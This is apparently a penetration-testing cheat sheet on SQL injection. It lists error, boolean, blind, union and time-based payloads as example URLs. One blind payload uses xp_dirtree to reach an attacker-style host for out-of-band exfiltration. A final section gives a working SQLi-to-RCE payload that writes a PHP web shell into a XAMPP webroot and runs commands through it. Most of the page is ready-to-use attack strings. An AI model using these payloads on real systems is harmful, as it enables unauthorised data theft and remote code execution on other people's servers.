SQLi
Payloads
Types
Error based
Forcing the database to perform some operation in which the result will be an error. Then try to extract some data from the database and show it in the error message.
Example
https://www.example.beaglesecurity.com/gallery.php?id=6'Boolean based
Relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.
Example
https://www.example.beaglesecurity.com/gallery.php?id=6' AND 1=1 --+Blind based
Sending payloads, observing the web application’s response and the resulting behavior of the database server. Check payloads.
Example
https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --Union based
UNION-based attacks allow the tester to easily extract information from the database. Because the UNION operator can only be used if both queries have the exact same structure, the attacker must craft a SELECT statement similar to the original query.
Example
https://example.com/products.aspx?id=1' UNION SELECT passwords from users;Time based
Forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.
Example
https://example.com/products.aspx?id=1' and if(substring(user(),2,1)='a',SLEEP(5),1)--SQLi to RCE
Using XAMP
Payload
# Inject cmd parameter
' union select 1,<php_payload>,3,4 into outfile <path> --
' union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --
# Reverse Shell created. Access from outside :
<host>/rce.php?cmd=<command>
# Test :
127.0.0.1/rce.php?cmd=time
# Result : The current time is: 16:22:25.20 Enter the new time: 3 4Last updated
Was this helpful?